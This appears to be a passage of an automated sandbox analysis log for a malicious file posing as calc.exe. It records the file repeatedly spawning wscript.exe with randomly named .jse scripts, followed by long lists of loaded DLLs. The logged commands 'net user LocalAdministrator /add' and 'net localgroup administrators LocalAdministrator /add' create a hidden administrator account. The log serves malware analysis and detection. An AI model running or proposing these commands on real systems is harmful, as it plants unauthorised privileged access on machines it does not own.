Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" BqmogIcAUc.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Jtk8zxQOt2.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" PZr1luuECN.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 5BgbSwcYMy.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 38gtKBXT3l.jse | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: winmm.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wsock32.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: sxs.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: jscript.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: scrrun.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: edputil.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: windows.staterepositoryps.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: appresolver.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: bcp47langs.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: slc.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: sppc.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: onecorecommonproxystub.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: onecoreuapcommonproxystub.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: jscript.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: winmm.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wsock32.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: sxs.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: jscript.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: scrrun.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: edputil.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: windows.staterepositoryps.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: appresolver.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: bcp47langs.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: slc.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: sppc.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: onecorecommonproxystub.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: onecoreuapcommonproxystub.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: dsrole.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: wkscli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: logoncli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samlib.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: dsrole.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: wkscli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: logoncli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samlib.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: jscript.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: winmm.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wsock32.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: sxs.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: jscript.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: scrrun.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: edputil.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: windows.staterepositoryps.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: appresolver.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: bcp47langs.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: slc.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: sppc.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: onecorecommonproxystub.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: onecoreuapcommonproxystub.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: dsrole.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: wkscli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: logoncli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samlib.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samcli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: netutils.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: dsrole.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: wkscli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: logoncli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samlib.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: jscript.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: mpr.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: version.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: winmm.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wsock32.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: uxtheme.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: windows.storage.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wldp.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: sxs.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: jscript.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: iertutil.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: amsi.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: userenv.dll | |
